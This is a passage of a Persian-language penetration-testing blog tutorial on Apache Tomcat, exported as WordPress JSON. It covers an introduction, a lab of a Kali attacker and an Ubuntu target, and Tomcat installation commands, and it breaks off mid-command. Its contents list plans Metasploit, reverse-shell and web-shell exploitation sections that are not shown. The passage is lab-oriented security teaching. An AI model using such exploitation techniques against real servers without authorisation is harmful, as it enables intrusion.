{"id":19472,"date":"2025-05-24T14:55:21","date_gmt":"2025-05-24T11:25:21","guid":{"rendered":"https:\/\/liangroup.net\/blog\/?p=19472"},"modified":"2025-05-24T10:21:15","modified_gmt":"2025-05-24T06:51:15","slug":"tomcat-penetration-testing","status":"publish","type":"post","link":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","title":{"rendered":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat"},"content":{"rendered":"<p><span style=\"font-size: 10pt\">Tomcat Penetration Testing \u0646\u0642\u0634 \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 Apache Tomcat \u0627\u06cc\u0641\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f\u061b \u0633\u0631\u0648\u06cc\u0633\u06cc \u06a9\u0647 \u0628\u0647\u200c\u0637\u0648\u0631 \u06af\u0633\u062a\u0631\u062f\u0647 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 web server \u0648 servlet container \u062f\u0631 \u062a\u0648\u0633\u0639\u0647\u200c\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u0648\u0628 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f. \u062f\u0631 \u0627\u0628\u062a\u062f\u0627\u060c Apache Software Foundation \u0627\u06cc\u0646 \u067e\u0631\u0648\u0698\u0647 \u0631\u0627 \u0628\u0627 \u0647\u062f\u0641 \u0627\u0631\u0627\u0626\u0647\u200c\u06cc \u06cc\u06a9 \u067e\u0644\u062a\u0641\u0631\u0645 \u0646\u0645\u0627\u06cc\u0634\u06cc \u0628\u0631\u0627\u06cc \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc Java Servlet \u0648 JavaServer Pages (JSP) \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u06a9\u0631\u062f\u061b \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0627\u0635\u0644\u06cc \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 Java web applications \u0631\u0627 \u062a\u0634\u06a9\u06cc\u0644 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f. \u0628\u0627 \u06af\u0630\u0634\u062a \u0632\u0645\u0627\u0646\u060c Tomcat \u0642\u0627\u0628\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u062e\u0648\u062f \u0631\u0627 \u06af\u0633\u062a\u0631\u0634 \u062f\u0627\u062f \u062a\u0627 \u0627\u0632 \u0633\u0627\u06cc\u0631 \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc Java \u062f\u0631 \u0628\u0633\u062a\u0631 \u0648\u0628 \u0646\u06cc\u0632 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u06cc\u0646\u060c \u06cc\u06a9\u06cc \u0627\u0632 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u0642\u0627\u0628\u0644\u200c\u062a\u0648\u062c\u0647 Tomcat\u060c \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0622\u0646 \u0627\u0632 \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc WAR (Web Application Archive) \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627 \u062a\u0645\u0627\u0645\u06cc \u0645\u0624\u0644\u0641\u0647\u200c\u0647\u0627\u06cc \u06cc\u06a9 web application \u2014 \u0634\u0627\u0645\u0644 \u06a9\u062f\u060c \u0635\u0641\u062d\u0627\u062a \u0648 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u2014 \u0631\u0627 \u062f\u0631 \u0642\u0627\u0644\u0628 \u06cc\u06a9 \u0628\u0633\u062a\u0647\u200c\u06cc \u0648\u0627\u062d\u062f \u062a\u062c\u0645\u06cc\u0639 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u0648 \u0641\u0631\u0627\u06cc\u0646\u062f \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0631\u0627 \u0633\u0627\u062f\u0647\u200c\u062a\u0631 \u0645\u06cc\u200c\u0633\u0627\u0632\u0646\u062f. \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u060c Tomcat \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc WAR \u062e\u0648\u062f \u0631\u0627 upload \u0648 \u0627\u062c\u0631\u0627\u00a0 \u06a9\u0646\u0646\u062f\u060c \u0648 \u0628\u062f\u06cc\u0646\u200c\u062a\u0631\u062a\u06cc\u0628\u060c \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062e\u0648\u062f \u0631\u0627 \u0628\u0631 \u0628\u0633\u062a\u0631 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u0646\u0645\u0627\u06cc\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0639\u0644\u0627\u0648\u0647 \u0628\u0631 WAR files\u060c Tomcat \u0627\u0632 \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0635\u0641\u062d\u0627\u062a JSP \u0646\u06cc\u0632 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. JSP (JavaServer Pages) \u06cc\u06a9 \u0641\u0646\u0627\u0648\u0631\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u0635\u0641\u062d\u0627\u062a \u0648\u0628 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Java \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u0646\u062f. \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646\u060c Tomcat \u062a\u0648\u0627\u0646\u0627\u06cc\u06cc \u0627\u062c\u0631\u0627\u06cc \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u06cc\u0646 \u0635\u0641\u062d\u0627\u062a JSP \u0631\u0627 \u062f\u0627\u0631\u062f \u0648 \u0647\u0645\u06cc\u0646 \u0648\u06cc\u0698\u06af\u06cc \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06cc\u06a9 \u067e\u0644\u062a\u0641\u0631\u0645 \u0686\u0646\u062f\u0645\u0646\u0638\u0648\u0631\u0647 \u0628\u0631\u0627\u06cc hosting \u0637\u06cc\u0641 \u06af\u0633\u062a\u0631\u062f\u0647\u200c\u0627\u06cc \u0627\u0632 web applications \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0647\u200c\u0635\u0648\u0631\u062a \u067e\u06cc\u0634\u200c\u0641\u0631\u0636\u060c Tomcat \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u06cc WAR files \u0648 \u0635\u0641\u062d\u0627\u062a JSP \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u0645\u062f\u06cc\u0631\u0627\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0622\u0646 \u0631\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u06a9\u0646\u0646\u062f \u062a\u0627 \u0627\u0645\u0646\u06cc\u062a \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0628\u06cc\u0634\u062a\u0631\u06cc \u0628\u0631 \u0631\u0648\u06cc file uploads \u0627\u0639\u0645\u0627\u0644 \u0634\u0648\u062f\u060c \u06a9\u0647 \u0627\u06cc\u0646 \u0627\u0645\u0631 \u0628\u0647 \u0628\u0647\u0628\u0648\u062f \u06a9\u0644\u06cc \u0627\u0645\u0646\u06cc\u062a server \u0645\u0646\u062c\u0631 \u0645\u06cc\u200c\u06af\u0631\u062f\u062f.<\/span><\/p>\n<h2>\u0645\u0639\u0631\u0641\u06cc Tomcat<\/h2>\n<p><span style=\"font-size: 10pt\">Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u067e\u0644\u062a\u0641\u0631\u0645 \u0627\u062c\u0631\u0627\u06cc \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc Java Servlet\u060c JavaServer Pages (JSP)\u060c \u0648 \u0633\u0627\u06cc\u0631 \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 Java EE \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u062d\u0628\u0648\u0628\u200c\u062a\u0631\u06cc\u0646 \u0627\u0646\u062a\u062e\u0627\u0628\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u0648 \u0627\u062c\u0631\u0627\u06cc Java web applications \u062f\u0631 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u062a\u0648\u0633\u0639\u0647 \u0648 production \u0634\u0646\u0627\u062e\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0633\u0627\u062f\u06af\u06cc \u062f\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u060c \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0627\u0632 WAR deployment\u060c \u0648 \u0645\u0639\u0645\u0627\u0631\u06cc \u0633\u0628\u06a9\u060c \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06af\u0632\u06cc\u0646\u0647\u200c\u0627\u06cc \u0645\u062d\u0628\u0648\u0628 \u062f\u0631 \u0645\u06cc\u0627\u0646 \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0648 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc DevOps \u062a\u0628\u062f\u06cc\u0644 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u06a9\u0627\u0631\u0628\u0631\u062f\u0647\u0627\u06cc<\/strong><strong> Tomcat <\/strong><strong>\u062f\u0631 \u0627\u0645\u0646\u06cc\u062a<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0627 \u0648\u062c\u0648\u062f \u0627\u06cc\u0646\u06a9\u0647 Apache Tomcat \u062f\u0631 \u0627\u0635\u0644 \u06cc\u06a9 web server \u0648 servlet container \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc Java web applications \u0627\u0633\u062a\u060c \u0646\u0642\u0634 \u0645\u0647\u0645\u06cc \u0646\u06cc\u0632 \u062f\u0631 \u0632\u0645\u06cc\u0646\u0647\u200c\u06cc \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u0645\u0627\u0646\u0647\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u0648\u0628 \u0627\u06cc\u0641\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0645\u0647\u0645\u200c\u062a\u0631\u06cc\u0646 \u06a9\u0627\u0631\u0628\u0631\u062f\u0647\u0627\u06cc \u0622\u0646 \u062f\u0631 \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0639\u0628\u0627\u0631\u062a\u200c\u0627\u0646\u062f \u0627\u0632:<\/span><\/p>\n<ol>\n<li><span style=\"font-size: 10pt\"><strong>\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0633\u0637\u062d \u0633\u0631\u0648\u0631<\/strong><strong> (Server Hardening):<br \/>\n<\/strong>Tomcat \u0627\u0645\u06a9\u0627\u0646 \u0627\u0639\u0645\u0627\u0644 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0627\u0645\u0646\u06cc\u062a\u06cc \u067e\u06cc\u0634\u0631\u0641\u062a\u0647\u200c\u0627\u06cc \u0645\u0627\u0646\u0646\u062f \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc\u200c\u0647\u0627\u060c \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc directory listing\u060c \u0648 \u06a9\u0646\u062a\u0631\u0644 \u062f\u0642\u06cc\u0642 user permissions \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u062f\u06cc\u0631\u06cc\u062a \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0648 \u0645\u062c\u0648\u0632\u062f\u0647\u06cc<\/strong><strong> (Authentication &amp; Authorization):<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u0632 \u0637\u0631\u06cc\u0642 Realms\u060c Tomcat \u0642\u0627\u0628\u0644\u06cc\u062a \u0627\u062a\u0635\u0627\u0644 \u0628\u0647 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u0647\u0627\u06cc \u062f\u0627\u062f\u0647\u060c LDAP \u06cc\u0627 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u062d\u0644\u06cc \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0645\u0646\u0627\u0628\u0639 \u0631\u0627 \u062f\u0627\u0631\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>SSL\/TLS Configuration:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">Tomcat \u0627\u0632 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0627\u0645\u0646 HTTPS \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 SSL\/TLS \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u06a9\u0647 \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc\u200c\u0634\u062f\u0647 \u0628\u06cc\u0646 \u06a9\u0644\u0627\u06cc\u0646\u062a \u0648 \u0633\u0631\u0648\u0631 \u0645\u0646\u062a\u0642\u0644 \u0634\u0648\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0622\u067e\u0644\u0648\u062f\u0647\u0627\u06cc \u0645\u062e\u0631\u0628<\/strong><strong> (Malicious Upload Prevention):<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0627 \u062a\u0646\u0638\u06cc\u0645 \u062f\u0642\u06cc\u0642 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc file upload (\u0645\u0627\u0646\u0646\u062f \u0646\u0648\u0639 MIME\u060c \u062d\u062c\u0645 \u0641\u0627\u06cc\u0644\u060c \u0648 \u0645\u0633\u06cc\u0631 \u0630\u062e\u06cc\u0631\u0647\u200c\u0633\u0627\u0632\u06cc)\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 Remote Code Execution \u06cc\u0627 Web Shell \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0627\u0632 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc<\/strong><strong> Logging <\/strong><strong>\u0648<\/strong><strong> Auditing:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u0645\u06a9\u0627\u0646 \u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc access logs \u0648 error logs \u062f\u0631 Tomcat\u060c \u0628\u0647 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u0645\u0634\u06a9\u0648\u06a9 \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc\u060c \u062a\u062d\u0644\u06cc\u0644 \u0648 \u0645\u0633\u062a\u0646\u062f\u0633\u0627\u0632\u06cc \u06a9\u0646\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u062d\u06cc\u0637 \u0645\u0646\u0627\u0633\u0628 \u0628\u0631\u0627\u06cc \u0622\u0632\u0645\u0627\u06cc\u0634\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong><strong> (Security Testing Platform):<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc penetration testing \u0627\u0632 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u06cc\u0627 \u0633\u0641\u0627\u0631\u0634\u06cc\u200c\u0634\u062f\u0647\u200c\u06cc Tomcat \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u062a\u0633\u062a\u200c\u0647\u0627\u06cc \u0646\u0641\u0648\u0630\u060c \u0628\u0631\u0631\u0633\u06cc misconfiguration\u0647\u0627\u060c \u0648 \u062a\u062d\u0644\u06cc\u0644 vulnerability exploitation \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/span><\/li>\n<\/ol>\n<h2>\u0641\u0647\u0631\u0633\u062a \u0645\u0637\u0627\u0644\u0628<\/h2>\n<ul>\n<li><strong>\u0645\u0642\u062f\u0645\u0647<\/strong><\/li>\n<li><strong>\u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0622\u0632\u0645\u0627\u06cc\u0634\u06af\u0627\u0647<\/strong><\/li>\n<li><strong>\u0646\u0635\u0628<\/strong><strong> Tomcat <\/strong><\/li>\n<li><strong>\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc<\/strong><\/li>\n<li><strong>\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u062c\u0645\u0639\u200c\u0622\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a<\/strong><\/li>\n<li><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 <\/strong><strong>Metasploit Framework<\/strong><\/li>\n<li><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc<\/strong><strong> Reverse Shell<\/strong><\/li>\n<li><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc<\/strong><strong> Web Shell<\/strong><\/li>\n<li><strong>\u062c\u0645\u0639\u200c\u0628\u0646\u062f\u06cc<\/strong><\/li>\n<\/ul>\n<h2>\u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0622\u0632\u0645\u0627\u06cc\u0634\u06af\u0627\u0647<\/h2>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647\u060c \u0642\u0635\u062f \u062f\u0627\u0631\u06cc\u0645 \u06cc\u06a9 Tomcat server \u0631\u0627 \u0631\u0648\u06cc \u0645\u0627\u0634\u06cc\u0646 Ubuntu \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 file upload \u0631\u0627 \u0645\u0648\u0631\u062f \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u0645. \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u0645\u0646\u0638\u0648\u0631\u060c \u062f\u0648 \u0645\u0627\u0634\u06cc\u0646 \u062f\u0631 \u06cc\u06a9 \u0645\u062d\u06cc\u0637 \u0634\u0628\u06a9\u0647 \u0645\u062d\u0644\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0634\u062f\u0647\u200c\u0627\u0646\u062f:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">Target Machine: Ubuntu \u2013 \u0622\u062f\u0631\u0633 IP: 192.168.1.5<\/span><\/li>\n<li><span style=\"font-size: 10pt\">Attacker Machine: Kali Linux \u2013 \u0622\u062f\u0631\u0633 IP: 192.168.1.7<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0633\u0627\u062e\u062a\u0627\u0631 \u0622\u0632\u0645\u0627\u06cc\u0634\u06af\u0627\u0647\u06cc \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u062a\u0633\u062a\u200c\u0647\u0627\u06cc \u0646\u0641\u0648\u0630 \u0648\u0627\u0642\u0639\u06cc \u062f\u0631 \u0645\u062d\u06cc\u0637 \u06a9\u0646\u062a\u0631\u0644\u200c\u0634\u062f\u0647 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u0648 \u0628\u0631\u0627\u06cc \u0634\u0628\u06cc\u0647\u200c\u0633\u0627\u0632\u06cc \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u0648 \u062a\u062d\u0644\u06cc\u0644 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u060c \u06a9\u0627\u0645\u0644\u0627\u064b \u0645\u0646\u0627\u0633\u0628 \u0627\u0633\u062a.<\/span><\/p>\n<h2><strong>\u0646\u0635\u0628<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">Apache Tomcat \u0628\u0647 Java \u0648\u0627\u0628\u0633\u062a\u0647 \u0627\u0633\u062a\u060c \u0628\u0647 \u0627\u06cc\u0646 \u0645\u0639\u0646\u0627 \u06a9\u0647 \u0628\u0627\u06cc\u062f Java JDK (Java Development Kit) \u0628\u0631 \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0634\u0645\u0627 \u0646\u0635\u0628 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f. \u0628\u0631\u0627\u06cc \u0646\u0635\u0628 \u0622\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">apt install openjdk-21-jdk<\/pre>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0627\u0641\u0632\u0648\u062f\u0646 \u06cc\u06a9 \u06a9\u0627\u0631\u0628\u0631 \u062c\u062f\u06cc\u062f \u0628\u0627 \u0646\u0627\u0645 tomcat \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">useradd -m -U -d \/opt\/tomcat -s \/bin\/false tomcat<\/pre>\n<p><img decoding=\"async\" class=\"alignnone  wp-image-19473\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8-300x34.png\" alt=\"\" width=\"565\" height=\"64\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8-300x34.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8-768x87.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8-150x17.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/1-8.png 887w\" sizes=\"(max-width: 565px) 100vw, 565px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0645\u0631\u062d\u0644\u0647\u200c\u06cc \u0628\u0639\u062f\u060c \u0641\u0627\u06cc\u0644 \u0641\u0634\u0631\u062f\u0647\u200c\u06cc tar.gz \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Tomcat \u0631\u0627 \u0627\u0632 \u0648\u0628\u200c\u0633\u0627\u06cc\u062a \u0631\u0633\u0645\u06cc \u062f\u0627\u0646\u0644\u0648\u062f \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone  wp-image-19474\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7-290x300.png\" alt=\"\" width=\"561\" height=\"580\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7-290x300.png 290w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7-768x796.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7-150x155.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/2-7.png 833w\" sizes=\"(max-width: 561px) 100vw, 561px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0633\u067e\u0633\u060c \u0622\u062e\u0631\u06cc\u0646 \u0646\u0633\u062e\u0647\u200c\u06cc Tomcat \u0631\u0627 \u0627\u0632 \u0648\u0628\u200c\u0633\u0627\u06cc\u062a \u0631\u0633\u0645\u06cc \u062f\u0627\u0646\u0644\u0648\u062f \u06a9\u0631\u062f\u0647 \u0648 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 Ubuntu \u0630\u062e\u06cc\u0631\u0647 \u06a9\u0646\u06cc\u062f\u060c \u0633\u067e\u0633 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u062f\u0627\u0646\u0644\u0648\u062f \u0634\u062f\u0647 \u0631\u0627 extract \u0646\u0645\u0627\u06cc\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">wget https:\/\/archive.apache.org\/dist\/tomcat\/tomcat-10\/v10.0.20\/bin\/apache-tomcat-10.0.20.tar.gz\r\ntar -xvf 